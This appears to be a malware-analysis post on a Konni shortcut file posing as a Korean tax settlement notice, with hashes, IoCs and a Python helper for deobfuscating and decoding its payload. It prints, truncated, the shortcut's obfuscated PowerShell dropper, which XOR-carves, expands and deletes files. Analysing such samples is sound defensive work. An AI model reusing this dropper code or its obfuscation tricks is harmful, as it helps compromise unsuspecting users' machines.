Malware created by the North Korean hacking group Konni: 2024년 귀속 연말정산 안내문_세한.docx (2025.2.28)
Today I am writing about 2024년 귀속 연말정산 안내문_세한.docx (2025.2.28), a piece of malware created by the North Korean hacking group Konni. The file name reads as a 2024 year-end tax settlement notice.
File name: 2024년 귀속 연말정산 안내문_세한.docx.lnk (note the .docx.lnk double extension: this is a Windows shortcut, not a Word document)
Size: 2 MB
MD5: a2785ec65622217be80174b887b1eb06
SHA-1: 5820e221437e87d6663adaddedb05bb5566be3da
SHA-256: b81513f0f8d3db382bb8f931bf2b7a0d4f26f74cfcf60b5d889de87ef2f1d543
The PowerShell code embedded in the malware, stored as the shortcut's command-line arguments in its StringData, is as follows:
StringData
{
namestring: docx File
relativepath: not present
workingdir: not present
commandlinearguments:
c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^|
findstr /i rshell(.)exe') do (if exist "%f" (%f "function wickedness{param($distant); <#h
indrance epoch#>$wicked = $distant(.)substring(0,$distant.length-4) + ''; <#reproach stor
y#>return $wicked;};function pregnant{param($hearing);<#goose margin#> re''m'(')ove''-''i
t''e''m <#naval rush#> -path $hearing <#wear deluge#> -force;};function friend{param($tho
usand,$harangue,$deformed,$greatnes(s),$measuring);<#stealing ingredient#> $suggestion=N'
'e''w-O''b''je''c''t System.IO.FileStream(<#cushion desolate#>$thousand,<#mostly incline#
>[Sys(t)em.IO.FileMode]::Open,<#valid guard#>[System.IO.FileAccess]::Read);<#desirous cri
sp#> $suggestion(.)Seek(<#page impression#>$harangue,[System.IO.SeekOrigin]::Begin);<#sus
pect spirituous#> $mass=$deformed*0x01;<#pliant entertain#> $lowering=New''-''(O)''b''jec
''t byte[] <#equa(t)or preacher#>$deformed; <#alkaline check#> $strike=Ne''w''-O''b''(j)e
''c''t byte[] <#rig(h)teous crossing#>$mass; <#whol(l)y invasion#>$suggestion.Read(<#inve
ntion dart#>$strike,0,<#apartment bearing#>$mass); $suggestion.Close();$minister=0(;)w(h)
ile($minister -lt $deformed){<#unstable treatment#>$lowering[$minister]=$strike[$minister
*0x01] -bxor $greatness;$minister+(+);}<#academy t(r)(u)ck#> set''-''co''n''t''en''t $mea
suring <#fault harbor#> $lowering -Enco(d)ing <#margin science#> Byte;};function weaving{
param($sweeten, $chosen);<#modify prevailing#> expand $sweeten <#woody hostile#> -F:* $ch
osen;};fu(n)ction familiar{$chain = $env:public<#telltale impartial#> + '\' +<#earthy vene
real#> 'do'+'cume'+'nts';<#fossil collec(t)or#> return $chain;};function ferment{param($d
rink); <#expansion refusal#>$ruling = Sp''l''it-''Pat''h $drink;<#disposal vent#> return
$rul(i)ng;};function pursue{return G''e''t-L''oca''tio''n;};function tangent{<#rough grea
se#>return $env:Temp;};function repetition{$preach(i)ng = pursue; $treatise …
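The script above hides its cmdlet names with '' splits, filler <# #> comments and '+'-joined string pieces, and its friend routine carves a payload out of the file by XORing a byte range with a one-byte key. The following Python helper is an added analysis example, not code from the original post or from the malware: it undoes those three obfuscation tricks and re-implements the XOR carve so the embedded payload can be recovered for inspection. The SAMPLE string is constructed in the same style as the page's script, not the page's exact payload, and the offset, length and key values are assumptions to be read off the deobfuscated script.

```python
import re

# Constructed sample in the style of the LNK payload above (not the page's
# exact script): filler <# #> comments, ''-split cmdlet names, '+'-joined strings.
SAMPLE = (
    "function pregnant{param($hearing);<#goose margin#> re''m''ove''-''i"
    "t''e''m <#naval rush#> -path $hearing <#wear deluge#> -force;};"
    "$chain = $env:public + '\\' + 'do'+'cume'+'nts';"
    "$wicked = $distant.substring(0,$distant.length-4) + '';"
)

def strip_block_comments(script: str) -> str:
    """Drop <# ... #> block comments; in this script they hold only random filler words."""
    return re.sub(r"<#.*?#>", "", script, flags=re.DOTALL)

def join_split_tokens(script: str) -> str:
    """Remove '' only inside a token (re''m''ove -> remove) so that a real
    empty-string literal such as  + ''  survives unchanged."""
    return re.sub(r"(?<=[A-Za-z0-9-])''(?=[A-Za-z0-9-])", "", script)

def fold_string_concat(script: str) -> str:
    """Merge 'do'+'cume'+'nts' into 'documents', repeating until stable."""
    pat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    prev = None
    while prev != script:
        prev, script = script, pat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script

def deobfuscate(script: str) -> str:
    cleaned = fold_string_concat(join_split_tokens(strip_block_comments(script)))
    return re.sub(r"[ \t]+", " ", cleaned).strip()

def cmdlets(script: str) -> list:
    """Verb-Noun tokens that become visible after cleanup (useful for triage rules)."""
    found = re.findall(r"\b[A-Za-z]+-[A-Za-z]+\b", deobfuscate(script))
    return sorted(set(found), key=str.lower)

def xor_carve(blob: bytes, offset: int, length: int, key: int) -> bytes:
    """Analyst re-implementation of the script's 'friend' routine: take `length`
    bytes at `offset` and XOR each with the one-byte key to recover the embedded
    payload (the script then hands it to expand.exe, consistent with a CAB archive)."""
    return bytes(b ^ key for b in blob[offset:offset + length])

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(cmdlets(SAMPLE))
```

Running deobfuscate over the real command line exposes remove-item, New-Object, set-content, Split-Path and Get-Location, and the numeric arguments passed to friend give the offset, length and key to feed xor_carve on the .lnk file.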
IoC
MD5: a2785ec65622217be80174b887b1eb06
SHA-256: b81513f0f8d3db382bb8f931bf2b7a0d4f26f74cfcf60b5d889de87ef2f1d543
SHA-1: 5820e221437e87d6663adaddedb05bb5566be3da